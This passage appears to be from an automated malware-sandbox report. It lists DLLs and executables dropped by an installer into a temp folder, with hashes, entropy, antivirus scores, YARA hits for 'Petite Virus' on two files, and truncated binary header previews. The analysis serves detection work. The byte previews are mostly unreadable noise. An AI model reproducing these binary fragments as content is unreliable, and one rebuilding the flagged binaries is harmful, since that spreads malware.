                                                                                                                                                                                                                                                                                                                                SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                                                                                                                                                                                                                                                                SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                                                                                                                                                                                                                                                                SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5KRR.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):35588
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.817557274117395
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                                                                                                                                                                                                                                                                MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                                                                                                                                                                                                                                                                SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                                                                                                                                                                                                                                                                SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                                                                                                                                                                                                                                                                SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5RMT.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):26126
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.048294343792499
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                                                                                                                                                                                                                                                                MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                                                                                                                                                                                                                                                                SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                                                                                                                                                                                                                                                                SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                                                                                                                                                                                                                                                                SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.423554884287906
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                                                                                                                                                                                                                                                                MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                                                                                                                                                                                                                                                                SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                                                                                                                                                                                                                                                                SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                                                                                                                                                                                                                                                                SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):214016
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.676457645865373
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                                                                                                                                                                                                                                                                MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                                                                                                                                                                                                                                                                SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                                                                                                                                                                                                                                                                SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                                                                                                                                                                                                                                                                SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):197646
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1570532273946625
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                                                                                                                                                                                                                                                                MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                                                                                                                                                                                                                                                                SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                                                                                                                                                                                                                                                                SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                                                                                                                                                                                                                                                                SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):562190
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.388293171196564
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                                                                                                                                                                                                                                                                MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                                                                                                                                                                                                                                                                SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                                                                                                                                                                                                                                                                SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                                                                                                                                                                                                                                                                SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):43520
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.232860260916194
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                                                                                                                                                                                                                                                                MD5:B162992412E08888456AE13BA8BD3D90
                                                                                                                                                                                                                                                                                                                                SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                                                                                                                                                                                                                                                                SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                                                                                                                                                                                                                                                                SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112640
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.540227486061059
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                                                                                                                                                                                                                                                                MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                                                                                                                                                                                                                                                                SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                                                                                                                                                                                                                                                                SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                                                                                                                                                                                                                                                                SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):36416
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.842278356440954
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                                                                                                                                                                                                                                                                MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                                                                                                                                                                                                                                                                SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                                                                                                                                                                                                                                                                SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                                                                                                                                                                                                                                                                SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):337408
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.515131904432587
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                                                                                                                                                                                                                                                                MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                                                                                                                                                                                                                                                                SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                                                                                                                                                                                                                                                                SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                                                                                                                                                                                                                                                                SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):31936
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.6461204214578
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                                                                                                                                                                                                                                                                MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                                                                                                                                                                                                                                                                SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                                                                                                                                                                                                                                                                SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                                                                                                                                                                                                                                                                SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):22542
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.5875455203930615
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                                                                                                                                                                                                                                                                MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                                                                                                                                                                                                                                                                SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                                                                                                                                                                                                                                                                SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                                                                                                                                                                                                                                                                SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):512014
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.566561154468342
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                                                                                                                                                                                                                                                                MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                                                                                                                                                                                                                                                                SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                                                                                                                                                                                                                                                                SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                                                                                                                                                                                                                                                                SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):967168
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.500850562754145
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                                                                                                                                                                                                                                                                MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                                                                                                                                                                                                                                                                SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                                                                                                                                                                                                                                                                SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                                                                                                                                                                                                                                                                SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                Category:dropped
